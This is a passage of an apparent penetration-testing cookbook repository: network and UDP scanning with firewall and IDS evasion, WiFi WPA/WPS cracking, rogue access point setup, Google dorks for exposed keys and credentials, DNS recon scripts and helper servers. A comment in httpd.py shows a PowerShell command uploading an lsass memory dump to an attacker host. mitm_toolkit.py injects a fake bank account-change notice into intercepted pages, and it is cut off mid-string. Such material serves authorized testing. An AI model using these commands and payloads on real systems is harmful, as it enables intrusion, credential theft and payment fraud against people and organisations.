$VAR_TARGET_CIDR -oA $VAR_FILENAME-ports-top-300-probes 71 | 72 | `` More intense, full port range 73 | 74 | -- In case the network might be monitored, light versioning, medium speed 75 | ~$ nmap -Pn -n -v -p- -sV --version-light -T3 -iL $VAR_TARGET_HOSTS -oA $VAR_FILENAME-ports-all 76 | 77 | -- In case the network is not monitored, full service and OS discovery, higher speed 78 | ~$ nmap -Pn -n -v -p- -sV -O -T4 -iL $VAR_TARGET_HOSTS 79 | 80 | `` Stealthy 81 | 82 | `` Scanning large network and trying to avoid detection, top ports, something between T3/T4, one host and probe at a time 83 | 84 | ~$ nmap -Pn -n -v --top-ports=800 --max-rtt-timeout=2000ms --min-rtt-timeout=300ms --initial-rtt-timeout=500ms --max-retries=2 --host-timeout=15m --max-parallelism=1 --max-hostgroup=1 -iL $VAR_TARGET_HOSTS 85 | 86 | `` Firewall bypassing 87 | 88 | ~$ nmap -T4 -sS -v -Pn -g 443 -n --top-ports 1500 -iL $VAR_TARGET_HOSTS 89 | 90 | `` Bypassing Windows IPsec filter 91 | 92 | ~$ nmap -sS -v -v -Pn -g 88 -O -A -p- -iL $VAR_TARGET_HOSTS 93 | 94 | `` Using zombies 95 | 96 | ~$ nmap -T2 --packet-trace -D RND,RND,RND,RND,RND,ME -Pn -v -sI VAR_ZOMBIE_HOST:443 --data-length -f --mtu 24 -iL $VAR_TARGET_HOSTS 97 | 98 | `` FTP bounce scanning 99 | 100 | ~$ nmap -b VAR_FTP_HOST -P0 -g 88 -n -v -sV -A --top-ports 500 -iL $VAR_TARGET_HOSTS 101 | 102 | `` Scanning over a SOCKS proxy 103 | 104 | ~$ proxychains -q nmap -sT -Pn -n -v $VAR_TARGET_CIDR 105 | 106 | `` PowerShell 107 | 108 | `` With simple range-based port scanning 109 | 110 | >$ 1..254 | % { $a = $_; 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.1.$a",$_)) "Port $_ is open!"} 2>$null} 111 | 112 | `` With simple list-based port scanning 113 | 114 | >$ 1..254 | % { $a = $_; write-host "------"; write-host "192.168.1.$a"; 22,53,80,445 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.1.$a",$_)) "Port $_ is open!"} 2>$null} 115 | 116 | `` TCP 117 | 118 | ~$ hping3 -S -8 1-65535 VAR_TARGET_HOST | grep -v 'Not responding' 119 | ~$ hping3 -S -c 3 -s 53 -p 80 VAR_TARGET_HOST 120 | ~$ proxychains -q nmap -T4 -Pn -sT -A -n -v --top-ports 2500 VAR_TARGET_HOST 121 | ~$ nc -vvn -w 1 -z VAR_TARGET_HOST 1-65535 122 | ~$ unicornscan -H -msf -Iv VAR_TARGET_HOST -p 1-65535 123 | 124 | `` UDP 125 | 126 | ~$ nmap -nv -sU -sV -Pn -p- --reason --stats-every 60s --max-rtt-timeout=150ms --max-retries=1 VAR_TARGET_HOST 127 | ~$ nc -nnvu -w 1 -z VAR_TARGET_HOST 1-65535 128 | ~$ unicornscan -H -mU -Iv VAR_TARGET_HOST -p 1-65535 129 | 130 | `` Fingerprinting 131 | 132 | ~$ amap -A VAR_TARGET_HOST VAR_TARGET_PORT 133 | ~$ nmap -A -sV -Pn -n -v VAR_TARGET_HOST -p VAR_TARGET_PORT 134 | ~$ nmap -A -sV -Pn -n -v --version-all VAR_TARGET_HOST -p VAR_TARGET_PORT 135 | 136 | `` Scripts 137 | 138 | `` PowerShell 139 | 140 | @ snippets/windows/utils/PortScanning.ps1 141 | 142 | `` Port knocking 143 | 144 | ~$ for x in 7000 8000 9000; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x VAR_TARGET_HOST; done 145 | 146 | `` Looking for information useful in further network penetration 147 | 148 | `` FTP 149 | 150 | ~$ nmap -PS21 --open -v -n -p21 --script ftp-anon -oA $VAR_FILENAME-tcp-21.txt $VAR_TARGET_CIDR 151 | 152 | `` NFS 153 | 154 | ~$ nmap -PS2049 --open -v -n -p2049 -oA $VAR_FILENAME-tcp-2049.txt $VAR_TARGET_CIDR 155 | ~$ nmap -PU2049 --open -v -n -sU -p2049 -oA $VAR_FILENAME-udp-2049.txt $VAR_TARGET_CIDR 156 | 157 | `` TFTP 158 | 159 | ~$ nmap -PU69 --open -v -n -sU -p69 -oA $VAR_FILENAME-tcp-69.txt $VAR_TARGET_CIDR 160 | 161 | `` SMB 162 | 163 | ~$ nmap -PS445 --open -v -n -p445 -oA $VAR_FILENAME-tcp-445.txt $VAR_TARGET_CIDR 164 | ~$ nmap --script smb-enum-shares -p445 -v -n --open -oA $VAR_FILENAME-smb-shares.txt $VAR_TARGET_CIDR 165 | 166 | `` SNMP 167 | 168 | ~$ nmap -sU --open -p161 $VAR_TARGET_CIDR 169 | 170 | `` HTTP / NAS 171 | 172 | - Run HTTP discovery with `pukpuk`, search for keywords in responses. 173 | -------------------------------------------------------------------------------- /Target.Network.Wireless.txt: -------------------------------------------------------------------------------- 1 | `` Important notes 2 | 3 | - Remove `firmware-realtek` and use dkms 4 | - Use `pentesting-bootsrap/bootstrap.rtl88**au.sh` scripts to install kernel modules 5 | 6 | `` Defaults 7 | 8 | -- AP: 00:00:00:00:00:00 9 | -- Client: 00:00:00:00:00:01 10 | -- Wireless interface: wlan0 11 | 12 | `` Setting up 13 | 14 | ~# airmon-ng check kill 15 | ~# rfkill unblock all 16 | ~# ip link set $WLAN down 17 | ~# export WLAN=wlan0 18 | ~# export WLAN_TARGET_MAC=000000000000 19 | 20 | `` Attacks 21 | 22 | `` wifite2 23 | 24 | - Tested with wifite2 2.7.0 25 | 26 | `` Generic 27 | 28 | ~# wifite -i $WLAN -mac --showb 29 | 30 | `` PMKID 31 | 32 | ~# wifite -i $WLAN -mac --showb --pmkid 33 | 34 | `` WEP 35 | 36 | ~# wifite -i $WLAN -mac --showb --wep --keep-ivs 37 | 38 | `` WPS 39 | 40 | ~# wifite -i $WLAN -mac --showb --wps --wps-only 41 | 42 | `` wash / reaver (WPS) 43 | 44 | -- Identifying target 45 | ~# wash -i $WLAN 46 | 47 | -- Cracking 48 | ~# reaver -i $WLAN -b $WLAN_TARGET_MAC -c 11 -vv -K 49 | 50 | -- Retrieve passphrase using PIN 51 | ~# reaver -i $WLAN -b $WLAN_TARGET_MAC -s y -vv -p 00000000 52 | 53 | `` hcxdumptool (WPA) 54 | 55 | - Tested with hcxdumptool 6.3.1 56 | - Compile hcxdumptool from sources! 57 | 58 | `` Setting up 59 | 60 | ~# export WLAN_MAC=`iw $WLAN info | grep addr | cut -d' ' -f2 -z` 61 | ~# hcxdumptool -m $WLAN 62 | 63 | `` Discovery 64 | 65 | -- 2.4Ghz and 5Ghz 66 | ~# hcxdumptool -i $WLAN -F --rcascan=p 67 | 68 | `` Selecting target 69 | 70 | ~# export WLAN_TARGET_FREQ=5640 71 | ~# export WLAN_TARGET_CH=7 72 | 73 | `` Creating filters 74 | 75 | `` Protect 76 | 77 | ~# tcpdump -i $WLAN not wlan addr2 $WLAN_MAC -ddd > protect.bpf 78 | 79 | `` Attack 80 | 81 | ~# tcpdump -i $WLAN wlan addr1 $WLAN_TARGET_MAC or wlan addr2 $WLAN_TARGET_MAC or wlan addr3 $WLAN_TARGET_MAC or wlan addr3 ff:ff:ff:ff:ff:ff -ddd > attack.bpf 82 | 83 | `` Execution 84 | 85 | ~# hcxdumptool -i $WLAN -c $WLAN_TARGET_CH -f $WLAN_TARGET_FREQ --bpf=attack.bpf -w output.pcapng 86 | ~$ hcxpcapngtool -o output.hc22000 output.pcapng 87 | ~$ hashcat -m 22000 output.hc22000 VAR_WORDLIST 88 | 89 | `` Helpers 90 | 91 | `` Random MAC address but matching device type 92 | 93 | ~# macchanger -a $WLAN 94 | 95 | `` Setting monitor mode 96 | 97 | ~# iw dev $WLAN set type monitor 98 | 99 | `` Verify settings 100 | 101 | ~# iw $WLAN info 102 | 103 | `` Test injection 104 | 105 | ~# aireplay-ng -9 $WLAN 106 | 107 | `` Discovery (changes channel) 108 | 109 | -- 2.4Ghz 110 | ~# airodump-ng $WLAN 111 | 112 | -- 5Ghz 113 | ~# airodump-ng $WLAN --band a 114 | 115 | `` Back to managed mode 116 | 117 | ~# iw dev $WLAN set type managed 118 | 119 | `` Restarting services 120 | 121 | ~# systemctl start wpa_supplicant.service 122 | ~# systemctl start NetworkManager.service 123 | 124 | `` Boosting tx power 125 | 126 | ~# iw $WLAN set txpower fixed 3000 127 | 128 | `` Setting channel 129 | 130 | ~# iw dev $WLAN set channel 11 131 | 132 | `` Setting custom MAC address 133 | 134 | ~# macchanger -m 00:00:00:00:00:01 $WLAN 135 | 136 | `` Check manufacturer based on MAC 137 | 138 | ~$ ~/lib/pentesting-cookbook/bin/mac_oui.sh $WLAN_TARGET_MAC 139 | 140 | `` Convert pcap to Hashcat's hccapx format 141 | 142 | ~$ hcxpcapngtool -o out.hccapx out.pcap 143 | 144 | -- Write strings to `wordlist` in case the traffic contained clear-text passwords 145 | ~$ hcxpcapngtool -o out.hccapx -E wordlist out.pcap 146 | 147 | -- Verify output 148 | ~$ wlanhcxinfo -i out.hccapx 149 | 150 | `` Device model using Wireshark 151 | 152 | - Filter: (wps.device_name != "" || wps.model_name != "" || wps.model_number != "") 153 | - In Tag: Vendor [...] WPS 154 | - Manufacturer: TP-Link 155 | - Model Name: TL-WR841N 156 | - Device Name: Wireless N Router TL-WR841N 157 | 158 | `` Cracking 159 | 160 | -- Dictionary attack 161 | ~$ hashcat -m 22000 wpa.hc22000 VAR_WORDLIST 162 | 163 | -- Dictionary attack with combinations (hashcat rules) 164 | ~$ hashcat -m 22000 -r /usr/share/hashcat/rules/best64.rule wpa.hc22000 VAR_WORDLIST 165 | 166 | -- Bruteforce attack 167 | ~$ hashcat -m 22000 wpa.hc22000 -a 3 -O -w 3 -1 ?l?d ?1?1?1?1?1?1?1?1?1?1?1?1?1 168 | 169 | `` Scenarios 170 | 171 | `` Routing, injection and NTLM 172 | 173 | ~# route del default 174 | ~# route add default gw $_IP $WLAN 175 | ~# iptables -A INPUT -j LOG 176 | ~# echo 1 > /proc/sys/net/ipv4/ip_forward 177 | ~# iptables -F 178 | ~# iptables -t nat -F 179 | ~# iptables -t nat -A PREROUTING -i $WLAN -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8080 180 | ~# iptables -t nat -A POSTROUTING -o $WLAN -j MASQUERADE 181 | ~# mitmproxy --mode transparent -s $_FILE.py --listen-host $_IP 182 | ~# responder -I $WLAN -wF 183 | 184 | `` CLI configuration 185 | 186 | ~$ vim wireless.config 187 | ctrl_interface=/var/run/wpa_supplicant 188 | ctrl_interface_group=0 189 | update_config=1 190 | network={ 191 | ssid="VAR_STRING" 192 | psk="VAR_STRING" 193 | } 194 | ~# wpa_supplicant -D wext -i $WLAN -c wireless.config 195 | ~# dhclient $WLAN 196 | 197 | `` IPv6 AP 198 | 199 | ~# cat > /etc/radvd.conf << EOF 200 | interface br-wlan-ipv6 { 201 | AdvSendAdvert on; 202 | MinRtrAdvInterval 3; 203 | MaxRtrAdvInterval 10; 204 | prefix fd13:37::/32 { 205 | AdvOnLink on; 206 | AdvAutonomous on; 207 | AdvRouterAddr on; 208 | }; 209 | }; 210 | EOF 211 | ~$ cat > hostapd.conf << EOF 212 | interface=$WLAN 213 | bridge=br-wlan-ipv6 214 | hw_mode=g 215 | channel=10 216 | wmm_enabled=1 217 | ssid=Free Wi-Fi 218 | auth_algs=1 219 | wpa=2 220 | wpa_key_mgmt=WPA-PSK 221 | rsn_pairwise=CCMP 222 | wpa_passphrase=somepassword 223 | EOF 224 | ~# ip link set $WLAN down 225 | ~# macchanger -A $WLAN 226 | ~# ip link set $WLAN up 227 | ~# ip link add name br-wlan-ipv6 type bridge 228 | ~# ip address add fd13:37::1 dev br-wlan-ipv6 229 | ~# ip link set br-wlan-ipv6 up 230 | ~# hostapd ./hostapd.conf 231 | -------------------------------------------------------------------------------- /Target.Recon.DNS.txt: -------------------------------------------------------------------------------- 1 | `` DNS 2 | 3 | `` CNAME hijacking 4 | 5 | @ bin/dns_cnames.sh 6 | 7 | 8 | `` Zone transfer 9 | 10 | ~$ dig @ns.VAR_TARGET_DOMAIN VAR_TARGET_DOMAIN -t axfr 11 | ~$ host -t axfr -l VAR_TARGET_DOMAIN ns.VAR_TARGET_DOMAIN 12 | ~$ dnsrecon -d VAR_TARGET_DOMAIN -t axfr 13 | 14 | @ bin/dns_transfer.sh 15 | 16 | `` Lookup 17 | 18 | ~$ whois VAR_TARGET_DOMAIN 19 | ~$ dig +nocomments +noauthority +noadditional +nostats VAR_TARGET_DOMAIN -t any 20 | ~$ dig +noall +answer VAR_TARGET_DOMAIN -t any 21 | ~$ nslookup -type=any VAR_TARGET_DOMAIN 22 | 23 | `` Enumeration 24 | 25 | `` Active (wordlist based) 26 | 27 | ~$ dnsrecon -d VAR_TARGET_DOMAIN -D VAR_WORDLIST -t brt --threads 8 28 | ~$ fierce -dns VAR_TARGET_DOMAIN -wordlist VAR_WORDLIST 29 | 30 | -- Using list of root domain names 31 | ~$ amass enum -brute -df VAR_FILE -w ~/lib/brutas/brutas-subdomains-1-small.txt 32 | 33 | `` Active 34 | 35 | ~$ dnsrecon -d VAR_TARGET_DOMAIN -t std,rvl 36 | ~$ fierce -range VAR_ATTACKER_HOST-100 -dnsserver ns.VAR_TARGET_DOMAIN 37 | 38 | `` Active with passive sources 39 | 40 | ~$ amass enum -brute -d VAR_TARGET_DOMAIN -w VAR_WORDLIST 41 | ~$ sublist3r -d VAR_TARGET_DOMAIN -b -t 50 42 | 43 | `` Completely passive 44 | 45 | ~$ subfinder -d VAR_TARGET_DOMAIN 46 | 47 | `` With zone transfer 48 | 49 | ~$ dnsenum VAR_TARGET_DOMAIN --enum -f VAR_WORDLIST 50 | ~$ amass enum -src -brute -ip -min-for-recursive 2 -active -d VAR_TARGET_DOMAIN 51 | -------------------------------------------------------------------------------- /Target.Recon.Dorks.txt: -------------------------------------------------------------------------------- 1 | `` Google 2 | 3 | `` Notes 4 | 5 | For more narrow search replace "VAR_ORGANIZATION_STRING" with site:VAR_TARGET_HOST 6 | 7 | `` Generics 8 | 9 | "Directory Listing for" "VAR_ORGANIZATION_STRING" 10 | intitle:"Index of" "VAR_ORGANIZATION_STRING" 11 | 12 | `` Exposed services 13 | 14 | (site:*/admin OR site:*/signin OR site:*/login) "VAR_ORGANIZATION_STRING" 15 | ("password" OR "admin" OR "panel") (intitle:signin OR intitle:login OR intitle:panel) "VAR_ORGANIZATION_STRING" 16 | (allinurl:"/*/_vti_pvt/" OR allinurl:"/*/_vti_cnf/") "VAR_ORGANIZATION_STRING" 17 | intext:"Index of /.git" "VAR_ORGANIZATION_STRING" 18 | intext:"Index of /.svn" "VAR_ORGANIZATION_STRING" 19 | 20 | `` Configuration and backups 21 | 22 | (".xml" OR ".yml" OR ".yaml" OR ".json" OR ".sql" OR ".cfg" OR ".conf" OR ".cnf" OR ".config" OR ".inf" OR ".ini" OR ".cgi" OR ".bak" OR ".csv" OR ".dll" OR ".sys") intitle:"Index of" "VAR_ORGANIZATION_STRING" 23 | (".log" OR ".zip" OR ".7z" OR ".rar" OR ".tar" OR ".gz" OR ".mdb" OR ".pem" OR ".rdp" OR ".ovpn" OR ".kdbx" OR ".key") intitle:"Index of" "VAR_ORGANIZATION_STRING" 24 | 25 | `` Specific files 26 | 27 | `` Web applications 28 | 29 | ("web.config" OR "config.py" OR "settings.py" OR ".dockerignore" OR "wwwroot" OR "wp-config.php" OR "access_log" OR "error_log" OR ".htaccess" OR "WEB-INF" OR "accounts.xml") intitle:"Index of" "VAR_ORGANIZATION_STRING" 30 | intitle:"Index of" (".asp" OR ".rb" OR ".php" OR ".py" OR ".jsp" OR ".env") "VAR_ORGANIZATION_STRING" 31 | 32 | `` Credentials 33 | 34 | ("authorized_keys" OR "id_rsa") -"id_rsa.pub" intitle:"Index of" "VAR_ORGANIZATION_STRING" 35 | 36 | `` Home dirs 37 | 38 | (".zshrc" OR ".bashrc" OR "desktop.ini" OR "trash" OR "My Documents") intitle:"Index of" "VAR_ORGANIZATION_STRING" 39 | 40 | `` Content-based 41 | 42 | ("INSERT INTO" OR "PRIVATE KEY") "VAR_ORGANIZATION_STRING" 43 | 44 | `` Communications and documents 45 | 46 | (".ods" OR ".odt" OR ".doc" OR ".docx" OR ".pdf" OR ".xls" OR ".xlsx" OR ".ppt" OR ".pptx") "VAR_ORGANIZATION_STRING" 47 | (".eml" OR ".ica" OR ".mbx" OR ".wab" OR ".ost" OR ".pst" OR ".txt") "VAR_ORGANIZATION_STRING" 48 | -------------------------------------------------------------------------------- /Target.Recon.OSINT.txt: -------------------------------------------------------------------------------- 1 | `` OSINT 2 | 3 | `` Automated 4 | 5 | ~$ theharvester -d VAR_TARGET_DOMAIN -l 250 -b google,baidu,yahoo,bing,pgp 6 | ~$ amass intel -active -addr VAR_TARGET_RANGE -p 80,443,8080 7 | -------------------------------------------------------------------------------- /bin/direnum_combo.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ -z $1 ]]; then 4 | echo "Usage: $0 http://example.com" 5 | exit 1 6 | fi 7 | 8 | shopt -s extglob 9 | TARGET=${1%%+(/)} 10 | USERAGENT="User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43" 11 | echo "Checking... $TARGET" 12 | echo "Using $USERAGENT" 13 | 14 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-usernames.txt -H "$USERAGENT" -u $TARGET/~FUZZ 15 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-http-paths.txt -H "$USERAGENT" -u $TARGET/FUZZ 16 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-http-paths.txt -H "$USERAGENT" -u $TARGET/FUZZ/ 17 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-http-paths.txt -H "$USERAGENT" -u $TARGET/.FUZZ 18 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-http-paths.txt -H "$USERAGENT" -u $TARGET/.FUZZ/ 19 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-http-paths.txt:PATH -w ~/lib/brutas/brutas-extensions.txt:EXT -H "$USERAGENT" -u $TARGET/PATHEXT 20 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-http-paths.txt:PATH -w ~/lib/brutas/brutas-extensions.txt:EXT -H "$USERAGENT" -u $TARGET/.PATHEXT 21 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-http-paths.txt -H "$USERAGENT" -u $TARGET/_FUZZ 22 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-http-paths.txt -H "$USERAGENT" -u $TARGET/__FUZZ 23 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-http-paths.txt:PATH -w ~/lib/brutas/brutas-extensions.txt:EXT -H "$USERAGENT" -u $TARGET/_PATHEXT 24 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-http-paths.txt:PATH -w ~/lib/brutas/brutas-extensions.txt:EXT -H "$USERAGENT" -u $TARGET/__PATHEXT -------------------------------------------------------------------------------- /bin/dns_cnames.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ -z $1 ]]; then 4 | echo "Usage: $0 domains.txt" 5 | exit 1 6 | fi 7 | 8 | for domain in $(cat "$1"); do 9 | result=$(dig +noall +answer $domain -t cname | cut -f6) 10 | if [[ -n $result ]]; then 11 | echo "$domain -> $result" 12 | fi 13 | done 14 | -------------------------------------------------------------------------------- /bin/dns_resolve.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ -z $1 ]]; then 4 | echo "Usage: $0 hosts.txt" 5 | exit 1 6 | fi 7 | 8 | filter='has no|not found' 9 | 10 | for domain in $(cat "$1"); do 11 | host -t a $domain | grep -v -E "$filter" | sed 's/ has address /;/' 12 | host -t aaaa $domain | grep -v -E "$filter" | sed 's/ has IPv6 address /;/' 13 | done -------------------------------------------------------------------------------- /bin/dns_transfer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ -z $1 ]]; then 4 | echo "Usage: $0 example.com" 5 | exit 1 6 | fi 7 | 8 | for ns in $(dig +noall +answer $1 -t ns | cut -f5); do 9 | dig @$ns $1 -t axfr | sed 's/.$//' 10 | done 11 | -------------------------------------------------------------------------------- /bin/download_files.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ -z $1 ]]; then 4 | echo "Usage: $0 urls.txt" 5 | exit 1 6 | fi 7 | 8 | for url in $(cat "$1"); do 9 | echo "Requesting: $url" 10 | wget --content-disposition --no-check-certificate "$url" 11 | done -------------------------------------------------------------------------------- /bin/download_int.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ -z $1 ]]; then 4 | echo "Usage: $0 http://example.com/asset- " 5 | exit 1 6 | fi 7 | 8 | for ((int=$2; int<=$3; int++)); do 9 | echo "Requesting: $1$int" 10 | wget --content-disposition "$1$int" 11 | done -------------------------------------------------------------------------------- /bin/ftp_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | 5 | from pyftpdlib.authorizers import DummyAuthorizer 6 | from pyftpdlib.handlers import FTPHandler 7 | from pyftpdlib.servers import FTPServer 8 | 9 | 10 | if __name__ == '__main__': 11 | 12 | parser = argparse.ArgumentParser( 13 | description='Starts a simple FTP server', 14 | formatter_class=argparse.ArgumentDefaultsHelpFormatter 15 | ) 16 | parser.add_argument('-un', '--username', help='Expected username', default='user') 17 | parser.add_argument('-up', '--password', help='Expected password', default='pass') 18 | parser.add_argument('-lh', '--addr', help='Listening address', default='') 19 | parser.add_argument('-lp', '--port', help='Listening port', type=int, default=21) 20 | parser.add_argument('-p', '--path', help='Exposed local path', default='./') 21 | parser.add_argument('-b', '--banner', help='Exposed FTP banner', default='FTPd 1.99') 22 | args = parser.parse_args() 23 | 24 | authorizer = DummyAuthorizer() 25 | authorizer.add_user(args.username, args.password, args.path, perm='elradfmw') 26 | handler = FTPHandler 27 | handler.authorizer = authorizer 28 | handler.banner = args.banner 29 | handler.passive_ports = range(60000, 65535) 30 | address = (args.addr, args.port) 31 | server = FTPServer(address, handler) 32 | server.max_cons = 256 33 | server.max_cons_per_ip = 5 34 | server.serve_forever() 35 | -------------------------------------------------------------------------------- /bin/hexdecode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | 5 | 6 | if __name__ == '__main__': 7 | 8 | parser = argparse.ArgumentParser(description='Turns escaped hexadecimal value into decoded string') 9 | parser.add_argument('value', help='E.g. \\x72\\x32\\x33\\x34') 10 | args = parser.parse_args() 11 | 12 | if 'x' in args.value: 13 | args.value = args.value.replace('x', '') 14 | result = bytearray.fromhex(args.value).decode('iso-8859-1') 15 | print(result) 16 | -------------------------------------------------------------------------------- /bin/hexreverse.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | 5 | 6 | if __name__ == '__main__': 7 | 8 | parser = argparse.ArgumentParser(description='Turns hexadecimal values into escaped and reversed string like \\x34\\x33\\x32\\x72') 9 | parser.add_argument('value', help='E.g. 72323334') 10 | args = parser.parse_args() 11 | 12 | result = bytearray.fromhex(args.value) 13 | result.reverse() 14 | print(''.join('\\x{:02x}'.format(b) for b in result)) 15 | -------------------------------------------------------------------------------- /bin/http_codes.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ -z $1 ]]; then 4 | echo "Usage: $0 urls.txt" 5 | exit 1 6 | fi 7 | 8 | for url in $(cat "$1"); do 9 | echo $url "->" $(curl -s -o /dev/null -w "\n%{http_code}\n" "${url}") 10 | done -------------------------------------------------------------------------------- /bin/httpd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | import cgi 5 | import logging 6 | import pathlib 7 | import socket 8 | import ssl 9 | from datetime import datetime 10 | from http import server 11 | 12 | 13 | logging.basicConfig(format='%(name)s %(levelname)s [%(asctime)s] %(message)s', level=logging.INFO) 14 | logger = logging.getLogger('httpd') 15 | 16 | 17 | # Example usage: 18 | # ~> powershell -exec bypass "(New-Object System.Net.WebClient).UploadFile('http://VAR_ATTACKER_HOST:8080/lsass.dmp', 'C:\Windows\Temp\lsass.dmp')" 19 | 20 | # Generating server.pem: 21 | # ~$ openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes 22 | 23 | 24 | class FileHandler(server.BaseHTTPRequestHandler): 25 | 26 | def __init__(self, *args, **kwargs): 27 | self.cwd = pathlib.Path.cwd() 28 | super().__init__(*args, **kwargs) 29 | 30 | def send_headers(self, content_type='text/html'): 31 | self.send_response(200) 32 | self.send_header('Content-type', content_type) 33 | self.send_header('Connection', 'close') 34 | self.end_headers() 35 | 36 | def get_temp_filename(self, client_host): 37 | name_date = datetime.now().strftime('%Y%m%d_%H%M') 38 | name = client_host + '-' + name_date 39 | suffix = 0 40 | while pathlib.Path(name).exists(): 41 | suffix += 1 42 | name = client_host + '-' + name_date + '-' + str(suffix) 43 | return name 44 | 45 | def get_path_filename(self): 46 | return self.path.partition('/')[-1] 47 | 48 | def get_client_address(self): 49 | return ':'.join([str(i) for i in self.client_address]) 50 | 51 | def do_GET(self): 52 | client_address = self.get_client_address() 53 | file_name = self.get_path_filename() 54 | local_path = pathlib.Path(self.cwd, file_name) 55 | if local_path.exists() and local_path.is_file() and self.cwd in local_path.parents: 56 | self.send_headers('application/octet-stream') 57 | logger.info('Sending file {} to {}...'.format(local_path, client_address)) 58 | with open(str(local_path), mode='rb') as fil: 59 | content = fil.read() 60 | self.wfile.write(content) 61 | else: 62 | self.send_headers() 63 | 64 | def do_POST(self): 65 | self.send_headers() 66 | client_address = self.get_client_address() 67 | form = cgi.FieldStorage( 68 | fp=self.rfile, 69 | headers=self.headers, 70 | environ={ 71 | 'REQUEST_METHOD': 'POST', 72 | 'CONTENT_TYPE': self.headers['Content-Type'], 73 | } 74 | ) 75 | file_name = self.get_path_filename() 76 | output = form.getvalue('file') 77 | if file_name and output: 78 | local_path = pathlib.Path(self.cwd, file_name) 79 | else: 80 | for key in form.keys(): 81 | output = form.getvalue(key) 82 | local_path = pathlib.Path(self.cwd, self.get_temp_filename(client_address + '-' + key)) 83 | logger.info('Saving file {} ({} bytes) from {}...'.format(local_path, self.headers['Content-Length'], client_address)) 84 | if self.cwd in local_path.parents: 85 | with open(local_path, 'wb') as fil: 86 | fil.write(output) 87 | logger.info('Saved {}'.format(local_path)) 88 | 89 | 90 | class HTTPServerV6(server.HTTPServer): 91 | 92 | address_family = socket.AF_INET6 93 | 94 | 95 | if __name__ == '__main__': 96 | 97 | parser = argparse.ArgumentParser( 98 | description='Saves files sent over HTTP POST to /path_is_filename.', 99 | formatter_class=argparse.ArgumentDefaultsHelpFormatter 100 | ) 101 | parser.add_argument('-i', '--addr', help='Listening address', default='') 102 | parser.add_argument('-p', '--port', help='Listening port', type=int, default=8080) 103 | parser.add_argument('-6', '--ipv6', help='Enable IPv6', action='store_true') 104 | parser.add_argument('-s', '--https', help='Enable HTTPS and use provided certificate', default=None) 105 | args = parser.parse_args() 106 | server_cls = HTTPServerV6 if args.ipv6 else server.HTTPServer 107 | server = server_cls((args.addr, args.port), FileHandler) 108 | if args.https: 109 | server.socket = ssl.wrap_socket(server.socket, certfile=args.https, server_side=True) 110 | server_type = 'HTTPS' if args.https else 'HTTP' 111 | logger.info('Started {} server at {}'.format(server_type, ':'.join([args.addr, str(args.port)]))) 112 | server.serve_forever() 113 | -------------------------------------------------------------------------------- /bin/mac_oui.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | mac="$(echo $1 | sed 's/ //g' | sed 's/-//g' | sed 's/://g' | cut -c1-6)" 4 | 5 | result="$(grep -i -A 4 ^$mac ~/lib/oui.txt)"; 6 | 7 | if [ "$result" ]; then 8 | echo "$result" 9 | else 10 | echo "$1 not found" 11 | fi -------------------------------------------------------------------------------- /bin/mitm_toolkit.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | import mitmproxy as mitm 4 | 5 | 6 | class ToolkitBase: 7 | 8 | def __init__(self): 9 | self.current_lab_ip = os.environ['CURRENT_LAB_IP'] 10 | 11 | 12 | class HTML(ToolkitBase): 13 | 14 | def load(self, loader): 15 | loader.add_option( 16 | name='toolkit_inject_html', 17 | typespec=bool, 18 | default=False, 19 | help='Toolkit: Inject HTML' 20 | ) 21 | 22 | def response(self, flow): 23 | if mitm.ctx.options.toolkit_inject_html: 24 | content_type = flow.response.headers.get('Content-Type', '') 25 | if 'text/html' in content_type: 26 | flow.response.replace( 27 | '', 28 | '

Warning!

Our account number has changed, a new one:

Fake Bank UK XXXX XXXXXX

